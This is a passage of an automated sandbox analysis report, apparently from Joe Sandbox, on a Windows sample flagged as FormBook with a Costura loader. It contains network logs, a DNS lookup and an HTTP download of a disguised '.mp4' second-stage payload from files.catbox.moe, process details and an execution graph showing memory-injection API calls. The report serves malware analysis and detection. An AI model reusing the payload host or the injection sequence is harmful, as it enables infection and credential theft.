                                        Nov 26, 2024 00:12:02.230803013 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.230838060 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.230880976 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.236310005 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.236325979 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.236391068 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.236421108 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.236459970 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.241549969 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.241571903 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.241636038 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.241647005 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.241682053 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.247117043 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.247136116 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.247220993 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.247230053 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.247272968 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.252824068 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.252846003 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.252918959 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.252928972 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.252980947 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.258372068 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.258388996 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.258486986 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.258497000 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.258541107 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.264002085 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.264019966 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.264101982 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.264111996 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.264158010 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.344697952 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.344713926 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.344850063 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.344887972 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.344930887 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.424407005 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.424428940 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.424571991 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.424609900 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.424654007 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.428308010 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.428323984 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.428389072 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.428416967 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.428455114 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.433978081 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.434003115 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.434062004 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.434096098 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.434138060 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.439044952 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.439062119 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.439130068 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.439156055 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.439197063 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.444828033 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.444848061 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.444928885 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.444952965 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.444993973 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.450222969 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.450239897 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.450306892 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.450329065 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.450367928 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.455107927 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.455156088 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.455180883 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.455193043 CET44349704108.181.20.35192.168.2.5
                                        Nov 26, 2024 00:12:02.455218077 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.455243111 CET49704443192.168.2.5108.181.20.35
                                        Nov 26, 2024 00:12:02.463243961 CET49704443192.168.2.5108.181.20.35
                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 26, 2024 00:11:57.317744970 CET6164753192.168.2.51.1.1.1
                                        Nov 26, 2024 00:11:58.033819914 CET53616471.1.1.1192.168.2.5
                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Nov 26, 2024 00:11:57.317744970 CET192.168.2.51.1.1.10xaa23Standard query (0)files.catbox.moeA (IP address)IN (0x0001)false
                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Nov 26, 2024 00:11:58.033819914 CET1.1.1.1192.168.2.50xaa23No error (0)files.catbox.moe108.181.20.35A (IP address)IN (0x0001)false
                                        • files.catbox.moe
                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.549704108.181.20.354431984C:\Users\user\Desktop\file.exe
                                        TimestampBytes transferredDirectionData
                                        2024-11-25 23:11:59 UTC76OUTGET /ne8lox.mp4 HTTP/1.1
                                        Host: files.catbox.moe
                                        Connection: Keep-Alive
                                        2024-11-25 23:12:00 UTC538INHTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Mon, 25 Nov 2024 23:12:00 GMT
                                        Content-Type: video/mp4
                                        Content-Length: 1192968
                                        Last-Modified: Mon, 25 Nov 2024 22:59:14 GMT
                                        Connection: close
                                        ETag: "67450142-123408"
                                        X-Content-Type-Options: nosniff
                                        Content-Security-Policy: default-src 'self' https://files.catbox.moe; style-src https://files.catbox.moe 'unsafe-inline'; img-src 'self' data:; font-src 'self'; media-src 'self'; object-src 'self';
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Methods: GET, HEAD
                                        Accept-Ranges: bytes
                                        2024-11-25 23:12:00 UTC15846INData Raw: a5 ff d6 8f cd 0e 55 c0 2c eb 72 b6 09 21 0d c9 08 9f d3 a4 ea cb 2d 8b 1a 66 82 0c e3 9e a3 0d 50 f2 93 71 7b 9a 6d bc 9d 9f 21 f3 67 39 7b d8 ec 94 85 d7 3e 1f 50 64 c7 4a bf ab 21 ab c5 71 85 43 99 49 14 41 77 d9 0b b6 ce f4 c0 b5 93 08 63 2e f8 73 b2 1e b7 38 83 f0 03 23 b5 77 a8 df e3 ee 31 09 27 70 9c 33 fc 6b a8 f5 ba 81 8d e5 58 d2 89 86 30 5f 09 9e 61 7a bf ca 2f 9a f8 83 9b b5 8d ac 54 06 d9 2e 64 6f 7e ac 48 b8 68 af f3 23 3a 7a 2c c9 fd 7e cc d4 d3 2c be 4b 7f 59 4d 9d 7e 48 9e 96 fe 48 fa 43 c1 f0 ec a2 8c 3b b0 24 77 b1 b9 cf ef b1 22 ab 30 41 9c b8 7b d6 e9 62 de c8 de af 1a ee 1d e6 15 02 1b 5d 13 ed fa d8 f0 ba fc ff a1 c3 d0 13 bd 75 9f 86 51 72 f9 b6 51 1a 53 f9 c3 5f 45 85 2f 8d 84 16 8b a7 06 da 28 1f 40 3b 6b 97 c9 b3 89 9f 7d c1 24
                                        Data Ascii: U,r!-fPq{m!g9{>PdJ!qCIAwc.s8#w1'p3kX0_az/T.do~Hh#:z,~,KYM~HHC;$w"0A{b]uQrQS_E/(@;k}$
                                        2024-11-25 23:12:00 UTC16384INData Raw: 56 f8 cb ef 74 c9 ca b4 f9 16 42 6a 8f 45 a3 6d 41 30 53 5e 77 35 a6 ee de 70 12 f2 6e ce f6 cd 9d 46 a6 1a bb 6a f6 ae b0 cb b4 5e 7e d5 89 03 b8 45 0c a5 5b 9f 6f 92 56 e7 87 48 ee cb 64 1e 31 a6 a4 23 4a df 2e 30 1e b6 59 0b cb 89 13 0c d7 74 6f dc 90 5c 52 25 ee f5 b1 30 75 b3 d5 a6 d7 87 b5 f3 b2 3b 72 0b 55 aa 8f 79 84 de 94 6f f5 42 36 e7 9e e0 6b 1e 2a 8c 28 2e 98 45 02 b1 b5 33 cb 81 6b 28 c9 7b ef fb 98 90 e5 fd 1e 85 2b 6c 90 58 b3 98 ad b2 cb 6d 8c b7 97 21 be 16 1b 0c bc 4e 98 cc 11 1c 36 d8 15 3c 05 9a 71 59 fe 5e 1d 3d 7b fa 09 63 dc 67 36 3f 69 7f a2 cd 55 c6 7d b9 41 24 0a 44 6d 4b a7 63 14 6b ea 53 e6 36 51 ac 5c 06 2d ff e2 20 54 a2 ac 7a 6e 54 e8 cd 25 ed 1b f3 1c 01 12 f8 3e 0c c0 42 86 4a 77 9a 0b d1 f2 d4 62 50 e1 13 46 86 1f 91 37
                                        Data Ascii: VtBjEmA0S^w5pnFj^~E[oVHd1#J.0Yto\R%0u;rUyoB6k*(.E3k({+lXm!N6<qY^={cg6?iU}A$DmKckS6Q\- TznT%>BJwbPF7
                                        2024-11-25 23:12:00 UTC16384INData Raw: e9 73 32 88 01 b7 d5 fe f2 5a db 76 fc a4 7e a2 e9 37 be b8 8f 7a 95 48 1d e9 70 24 3b 14 3b ad c1 4d 8a 57 a8 2d ab cc da 99 c9 45 ea c8 09 9a 5b 01 7f e1 25 0e 7f 18 01 e0 85 3e 15 be 43 8f a6 7c b2 f0 e7 30 e6 eb 3d 85 04 ae 3f 15 69 15 f0 be 05 50 01 3a 6a 28 44 38 92 d9 9f 63 9a 1d 97 e3 c8 0d ac 5c 9b b6 5f d0 d7 7c ed 53 33 d1 43 49 af e0 3b 9a b5 a9 c5 da 34 b9 29 f6 55 8a a2 e5 71 1a fc 98 96 d0 7b ee bf ab e3 c6 15 5f f9 63 fb 3e 4d 3a 40 0c c7 9b 77 2b f6 c7 1e 66 13 69 88 d5 35 f7 f8 a3 b4 ac ac 28 a4 f6 dc f3 8c 27 a1 c1 dd 9b 6b 9d e8 12 53 79 7a 22 02 7d fe a4 9c c9 48 dc 61 c0 51 d7 59 49 b4 cb 62 bd 60 87 f2 69 80 05 aa 85 fb 6d e8 19 6f 7a d7 69 4b 54 14 b6 9d 8a dc f9 35 07 3b 28 61 16 ec 10 b4 4c f4 ac 3a 9e 6b 99 10 8c d3 d2 9e ae 74
                                        Data Ascii: s2Zv~7zHp$;;MW-E[%>C|0=?iP:j(D8c\_|S3CI;4)Uq{_c>M:@w+fi5('kSyz"}HaQYIb`imoziKT5;(aL:kt
                                        2024-11-25 23:12:00 UTC16384INData Raw: f2 9f fe 75 fb 38 23 52 e4 23 81 b5 53 6d 28 63 68 73 3f d4 be 34 35 15 ee 09 56 d4 24 96 d9 fd 6d 1c 56 b2 86 db 65 cb 62 e8 2a 1a 11 29 c4 6d c2 a3 50 a2 c3 c2 79 b1 42 bc b6 1b 74 34 a7 05 b8 79 78 21 db 8c fb 1e 43 cd 17 b9 79 c3 dd 32 f1 94 3c 47 20 a7 44 a0 4b e8 19 a2 0a 71 1b 1f 4f 1d 64 57 22 ef fa 65 b7 fb 51 90 4f 1f 78 45 4c 18 2e 8b 3f c6 59 c1 05 8e 1c 18 d7 3a 44 c3 10 80 a0 44 6c 2f 0f d1 b2 52 17 0b 2a 55 05 f1 e6 c8 16 36 c8 1a 8c 99 d5 da f0 f3 67 69 0b e4 42 b0 33 39 bc 3c 42 d2 7d 35 23 e6 43 20 15 90 87 a1 a8 47 c2 9d 32 5d 15 1a 73 2c 95 22 63 de d1 ed 16 5b f8 eb 90 1f 44 65 ac 91 c3 1a 91 98 61 d6 47 14 c0 f3 f3 60 89 bb e2 46 41 48 c9 37 42 e0 ba e8 c0 cd cd 46 fe b1 43 a7 a1 f8 df a5 7b dc f8 87 c4 62 23 e1 de 08 ab 22 c6 7d 01
                                        Data Ascii: u8#R#Sm(chs?45V$mVeb*)mPyBt4yx!Cy2<G DKqOdW"eQOxEL.?Y:DDl/R*U6giB39<B}5#C G2]s,"c[DeaG`FAH7BFC{b#"}
                                        2024-11-25 23:12:00 UTC16384INData Raw: 6e e7 fc ca 6d 15 14 07 b3 c0 15 2c 9f 19 b7 6f 16 e6 13 f3 58 59 46 e4 84 8e 03 79 e8 c9 0a bf 80 fc 2c e7 50 30 56 b4 e4 86 fc 80 0c fa 9d 2d 65 ed 43 7d 3d 01 59 f6 ca 96 0b 5a fd 9f 28 a3 80 bd e4 97 47 88 39 83 f9 48 ee 62 34 6c 59 2b 7d bd b6 ba d0 16 8f 2b 21 3e 16 cc cc 18 6e 02 28 36 f9 87 56 53 93 54 a0 c5 2a 76 41 26 a9 83 f7 e0 f7 5e 44 74 b0 0c fc c2 e8 a5 a9 cb 72 47 ee b6 12 7b bc e5 26 34 63 e9 9a de b3 96 89 88 1c cd a5 7e a7 e2 72 0c 39 37 12 6c 76 c2 c5 ca 01 7d 9c 5f ee 91 88 58 40 32 85 15 57 83 8e 61 36 7b dd 5c 41 4a bb ba 06 7e d8 f5 ce 66 94 c2 6a 31 fb 6f f6 3d c8 47 52 a0 e2 74 1e 39 af 36 62 ee 20 04 ed 25 ab 8b a0 27 ca 4c 2a 7c ae 7c 81 f2 4a 26 32 6b 1f 3c 43 19 eb 02 37 dd bd 52 2d f6 7a ba 53 e2 74 43 f8 cd 80 60 39 8f f9
                                        Data Ascii: nm,oXYFy,P0V-eC}=YZ(G9Hb4lY+}+!>n(6VST*vA&^DtrG{&4c~r97lv}_X@2Wa6{\AJ~fj1o=GRt96b %'L*||J&2k<C7R-zStC`9
                                        2024-11-25 23:12:00 UTC16384INData Raw: b3 1e 64 c3 7a d0 e2 80 37 c7 37 3f 01 1d fc fa da ec 7e b2 a9 38 e1 44 ae 72 84 b1 8f b2 22 ec bc a7 eb bf b6 f0 59 5e 4d 75 41 9d 4c 7c 04 f5 4c 52 70 b0 e7 00 ba 70 16 71 00 49 6e 95 0e db 76 fd 2d 92 f6 a1 3e 97 cb 86 2c 24 71 6b 76 76 1a 12 5d 5c ef 48 38 d8 63 de 55 63 33 51 55 77 23 0d a7 df 63 9e 26 3f 9d fa 24 74 84 a2 2a 7e d5 eb d8 04 59 23 04 eb 0e 54 24 52 b8 08 58 14 eb 87 4a 1b e7 b9 f6 14 04 5d 1a 50 61 d5 84 47 2f 7b 32 7f b5 fd 2c 4f 59 a7 fc 70 3e 42 fc 2c 1f b3 0d c2 7f e9 5b 27 d4 c3 b7 74 3c 52 1f 2e 10 41 ed bb 5c 93 55 3a 0a 3d a4 32 be e2 12 54 80 29 35 cd d6 b8 c5 b8 1b 92 ee b1 34 07 b7 b1 f6 b0 1f 8f a8 0a 93 e0 67 5a 40 0b 24 75 fe be f0 73 c4 03 0f 53 51 b8 8c 84 ef 6b 15 3a 4e 10 e3 8c 0f 7e bd 09 48 e7 39 97 5e 15 67 33 ca
                                        Data Ascii: dz77?~8Dr"Y^MuAL|LRppqInv->,$qkvv]\H8cUc3QUw#c&?$t*~Y#T$RXJ]PaG/{2,OYp>B,['t<R.A\U:=2T)54gZ@$usSQk:N~H9^g3
                                        2024-11-25 23:12:00 UTC16384INData Raw: c6 78 3b 94 4b a7 81 b9 9d e5 2a 7a 4e 98 23 c6 29 ef 19 69 76 66 9a d1 82 1c 7b f6 c0 ba 54 37 eb 9d 8c 04 4f 6d 5f cb 30 d9 53 da 17 c7 59 3c 07 fe 9b 9b 4c f1 6e 96 61 f2 cb 45 7e b6 18 25 fd 90 13 00 c7 62 cb 2e 63 85 64 d9 82 40 61 aa fd 21 92 6d 3e 07 c1 8b d2 d2 10 fd 21 90 93 92 1e d3 44 ff 7b a6 3c d2 1c c0 f7 b8 d5 51 0a af 82 df c4 33 b4 c8 55 be b9 94 ab de 2e 2c da ca ae ff 64 96 40 2d 2a 81 a6 4a 47 2b a1 f4 f8 3c f1 94 79 3f 3b c5 94 b6 d3 1d 80 1a 4a db 25 3a 5e 61 9b a2 e9 28 84 39 42 fc 3d 12 9e 4c 66 58 88 05 8b 60 51 28 92 07 1c 69 c3 1b 00 9c 8e 95 b8 c6 ad c0 4e 47 a3 cf 51 58 d3 b8 90 b6 48 3d 08 fd 74 18 45 53 d5 b9 06 85 bb 0d db f5 92 8e 83 9b 78 22 ac a8 08 7c 52 9d 00 40 af e5 ae a0 67 6b 99 46 eb 27 a0 98 43 41 c5 03 9e ea 48
                                        Data Ascii: x;K*zN#)ivf{T7Om_0SY<LnaE~%b.cd@a!m>!D{<Q3U.,d@-*JG+<y?;J%:^a(9B=LfX`Q(iNGQXH=tESx"|R@gkF'CAH
                                        2024-11-25 23:12:00 UTC16384INData Raw: b0 4b a3 f4 4b a6 3d 2b f8 bd cd c5 3b 53 55 7b 3d d5 4c d6 81 40 f1 35 98 69 44 2e 63 e7 ab 34 4d 50 a8 2d 25 b1 00 10 9a cb 00 2f 04 8d ea d2 9f f6 11 b5 a6 f4 9a 2c d0 d9 f8 ad 14 9b 03 54 71 fa 4d f4 a1 bd fa 78 76 89 a0 2d 02 2c 0b c5 a2 de 2e 9d b2 56 fb 7f 38 da dd 24 97 80 fe ef dd e5 e8 c8 95 e5 24 a0 43 b5 6b b9 2c a9 30 b4 e6 08 ca 66 71 6f 94 9a 73 76 a6 65 c6 39 0b 25 06 e8 e3 4c 26 18 2e 4a 52 dd a9 5c 97 26 96 47 10 7b b3 dc 65 ba c4 73 f5 b2 71 1c a0 6c 01 e1 a3 8a a8 c3 66 2a 34 41 a2 7d 3a 36 9e e6 51 b2 99 51 76 af b4 36 3a 22 9b 76 d8 98 9b 9d 3f 87 0b ee d2 69 32 69 78 c6 8b b0 6a eb ba be d0 4a d6 01 ce 6a 8e d8 ea 21 df 70 32 8e 1f 50 be 74 c3 a2 ce a6 3f 91 b0 ec 08 f7 9e d5 62 b8 90 f1 1c 7b 3d 5d ec 21 44 b9 2f 90 db 5c 6a 26 bf
                                        Data Ascii: KK=+;SU{=L@5iD.c4MP-%/,TqMxv-,.V8$$Ck,0fqosve9%L&.JR\&G{esqlf*4A}:6QQv6:"v?i2ixjJj!p2Pt?b{=]!D/\j&
                                        2024-11-25 23:12:00 UTC16384INData Raw: 80 ee 9d 87 ae 6c c0 af ec de 90 db 72 7d 8b aa 6b 8e 61 31 15 99 1c 68 a8 47 49 22 ac 90 2b 23 2c 23 47 02 81 e1 ef 1e 8e a6 fc 77 d5 9d 23 34 e3 e6 ae 71 55 fb da a6 1b 51 07 9f 66 14 6e 51 13 b2 e4 6a 7d e5 db af 5c cb a1 98 26 25 81 d2 78 33 96 09 12 d7 36 b0 66 55 43 f8 0e 01 ad f7 4e c6 9a ff 3b 72 37 de 3b 4b 51 58 fc df 91 27 b2 2c 6d b1 38 70 ed 3c 03 74 c0 f2 11 ba 74 31 8e bb 6f ce 06 7b 78 d5 3c c7 68 4c 4d be 79 c7 71 cb 0b 25 da b5 ae cf 53 2d 21 3d c4 9b c7 e5 9d 5a 5b dd 4e 89 66 15 14 22 6f 10 9c fc 24 f0 55 25 fd ca a8 3c 80 d5 01 f0 ac d3 d8 ce dd ba 7e f8 69 da 62 ba 37 c4 63 fb 2f 46 fc f2 eb 91 c4 df b4 00 19 ca 1b a6 cb 38 6b c2 63 af 4a 29 9c 21 db fd 19 1d 0a 39 a6 fa 61 55 e1 7b f1 ee 1a 35 c2 f3 6e 6b ba 69 be 2c 49 bb d9 e8 fb
                                        Data Ascii: lr}ka1hGI"+#,#Gw#4qUQfnQj}\&%x36fUCN;r7;KQX',m8p<tt1o{x<hLMyq%S-!=Z[Nf"o$U%<~ib7c/F8kcJ)!9aU{5nki,I
                                        2024-11-25 23:12:00 UTC16384INData Raw: de 12 26 f5 17 f5 be b6 54 02 21 83 2f 0b 42 08 79 5e 77 cc 29 18 a0 f8 aa ab be a6 87 49 d2 6e 2b 9a 8f 60 dd c2 26 16 ca 18 a7 78 39 51 8b 66 2c 95 89 e2 f4 60 76 06 d0 d5 55 9c 04 cb 36 0f b6 06 48 2e 49 ee 28 b8 5b 73 b5 c7 1e 8d 60 0c f0 1c 14 ef c1 93 cd 86 e1 a7 6a 60 f5 7c c1 a2 1d 47 2d 36 10 b7 fa 7a e7 b4 2e 2b 59 56 ad 3e ba aa 57 e4 f8 70 c5 40 6c 16 5f e3 f3 08 1c 7a 27 ae 98 0a 34 ba bc f3 82 76 1b 97 60 aa 5c f0 0a 6d 60 9b 15 c7 f4 08 44 14 cb c4 dd 1f f0 6b 3f d4 7f 34 66 02 15 81 06 2d 1d b5 6b 47 59 f3 88 af 81 d0 73 fa 71 4a c2 34 34 f9 8a 74 d5 8d b8 1c d9 41 0e 27 ed 3d 3a 20 bb 45 d7 fe 46 c2 be 1a 5f 4b 06 27 c8 cf e3 12 93 97 00 37 0e ff c6 b2 fc 25 c6 98 ed 03 d7 3c 9a a4 b6 2f f4 48 22 bd 49 d7 35 3c 7c 53 3f 44 60 e2 fc c6 f9
                                        Data Ascii: &T!/By^w)In+`&x9Qf,`vU6H.I([s`j`|G-6z.+YV>Wp@l_z'4v`\m`Dk?4f-kGYsqJ44tA'=: EF_K'7%</H"I5<|S?D`


                                        Click to jump to process

                                        Click to jump to process

                                        Click to dive into process behavior distribution

                                        Click to jump to process

                                        Target ID:0
                                        Start time:18:11:56
                                        Start date:25/11/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0x2d0000
                                        File size:233'472 bytes
                                        MD5 hash:0A089E934EB856C3E809D0FAC53000C7
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2133396929.0000000006A50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:18:12:02
                                        Start date:25/11/2024
                                        Path:C:\Users\user\Desktop\file.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                        Imagebase:0xbb0000
                                        File size:233'472 bytes
                                        MD5 hash:0A089E934EB856C3E809D0FAC53000C7
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Reset < >

                                          Execution Graph

                                          Execution Coverage:11.5%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:2.9%
                                          Total number of Nodes:309
                                          Total number of Limit Nodes:7
                                          execution_graph 55580 68f718f 55583 68fde00 55580->55583 55585 68fde27 55583->55585 55587 68fe250 55585->55587 55588 68fe298 VirtualProtect 55587->55588 55590 68f0975 55588->55590 55919 d9d118 55920 d9d130 55919->55920 55921 d9d18b 55920->55921 55923 68fe858 55920->55923 55924 68fe880 55923->55924 55927 68fece8 55924->55927 55925 68fe8a7 55928 68fed15 55927->55928 55929 68fde00 VirtualProtect 55928->55929 55931 68feeab 55928->55931 55930 68fee9c 55929->55930 55930->55925 55931->55925 55932 699a95a 55933 699a969 55932->55933 55937 69a3048 55933->55937 55941 69a3038 55933->55941 55934 699a9a7 55938 69a305d 55937->55938 55945 69a31a5 55938->55945 55942 69a3048 55941->55942 55944 69a31a5 2 API calls 55942->55944 55943 69a3073 55943->55934 55944->55943 55947 69a31c7 55945->55947 55946 69a3073 55946->55934 55947->55946 55948 69a73d8 VirtualProtect 55947->55948 55949 69a73d0 VirtualProtect 55947->55949 55948->55947 55949->55947 55907 69c7728 55908 69c7776 NtProtectVirtualMemory 55907->55908 55910 69c77c0 55908->55910 55962 24ed0b8 55963 24ed0fe 55962->55963 55966 24ed298 55963->55966 55969 24eb410 55966->55969 55970 24ed300 DuplicateHandle 55969->55970 55971 24ed1eb 55970->55971 55595 699a60e 55596 699a618 55595->55596 55600 69ae458 55596->55600 55604 69ae448 55596->55604 55597 699a656 55601 69ae46d 55600->55601 55602 69ae483 55601->55602 55608 69ae7b0 55601->55608 55602->55597 55605 69ae44d 55604->55605 55606 69ae483 55605->55606 55607 69ae7b0 10 API calls 55605->55607 55606->55597 55607->55606 55609 69ae7b6 55608->55609 55613 69aff30 55609->55613 55618 69aff40 55609->55618 55614 69aff40 55613->55614 55623 69c03cf 55614->55623 55627 69c0407 55614->55627 55619 69aff55 55618->55619 55621 69c03cf 10 API calls 55619->55621 55622 69c0407 10 API calls 55619->55622 55620 69ae922 55621->55620 55622->55620 55624 69c03ce 55623->55624 55624->55623 55631 69c0b30 55624->55631 55643 69c0b21 55624->55643 55628 69c03ce 55627->55628 55628->55627 55629 69c0b30 10 API calls 55628->55629 55630 69c0b21 10 API calls 55628->55630 55629->55628 55630->55628 55632 69c0b45 55631->55632 55634 69c0b67 55632->55634 55655 69c14ad 55632->55655 55660 69c1072 55632->55660 55666 69c1ee7 55632->55666 55671 69c14c7 55632->55671 55676 69c1426 55632->55676 55681 69c0d75 55632->55681 55686 69c1725 55632->55686 55691 69c15b5 55632->55691 55696 69c0f04 55632->55696 55634->55624 55644 69c0b30 55643->55644 55645 69c0b67 55644->55645 55646 69c14ad 2 API calls 55644->55646 55647 69c0f04 2 API calls 55644->55647 55648 69c15b5 2 API calls 55644->55648 55649 69c1725 2 API calls 55644->55649 55650 69c0d75 2 API calls 55644->55650 55651 69c1426 2 API calls 55644->55651 55652 69c14c7 2 API calls 55644->55652 55653 69c1ee7 2 API calls 55644->55653 55654 69c1072 2 API calls 55644->55654 55645->55624 55646->55645 55647->55645 55648->55645 55649->55645 55650->55645 55651->55645 55652->55645 55653->55645 55654->55645 55656 69c0c8f 55655->55656 55657 69c15db 55655->55657 55656->55634 55701 69c8f68 55657->55701 55705 69c8f61 55657->55705 55661 69c1078 55660->55661 55709 69c2460 55661->55709 55727 69c2470 55661->55727 55745 69c24d2 55661->55745 55662 69c10af 55667 69c1ef6 55666->55667 55832 69c9208 55667->55832 55836 69c9210 55667->55836 55668 69c0c8f 55668->55634 55672 69c14d6 55671->55672 55674 69c9208 WriteProcessMemory 55672->55674 55675 69c9210 WriteProcessMemory 55672->55675 55673 69c0c8f 55673->55634 55674->55673 55675->55673 55677 69c1433 55676->55677 55840 69c9880 55677->55840 55844 69c9888 55677->55844 55678 69c1816 55682 69c0d84 55681->55682 55848 69c8958 55682->55848 55852 69c8950 55682->55852 55683 69c0c8f 55683->55634 55687 69c1734 55686->55687 55689 69c8958 Wow64SetThreadContext 55687->55689 55690 69c8950 Wow64SetThreadContext 55687->55690 55688 69c0c8f 55688->55634 55689->55688 55690->55688 55692 69c15bf 55691->55692 55694 69c8f68 VirtualAllocEx 55692->55694 55695 69c8f61 VirtualAllocEx 55692->55695 55693 69c0c8f 55693->55634 55694->55693 55695->55693 55697 69c0f0a 55696->55697 55699 69c9208 WriteProcessMemory 55697->55699 55700 69c9210 WriteProcessMemory 55697->55700 55698 69c0c8f 55698->55634 55699->55698 55700->55698 55702 69c8fa8 VirtualAllocEx 55701->55702 55704 69c8fe5 55702->55704 55704->55656 55706 69c8f68 VirtualAllocEx 55705->55706 55708 69c8fe5 55706->55708 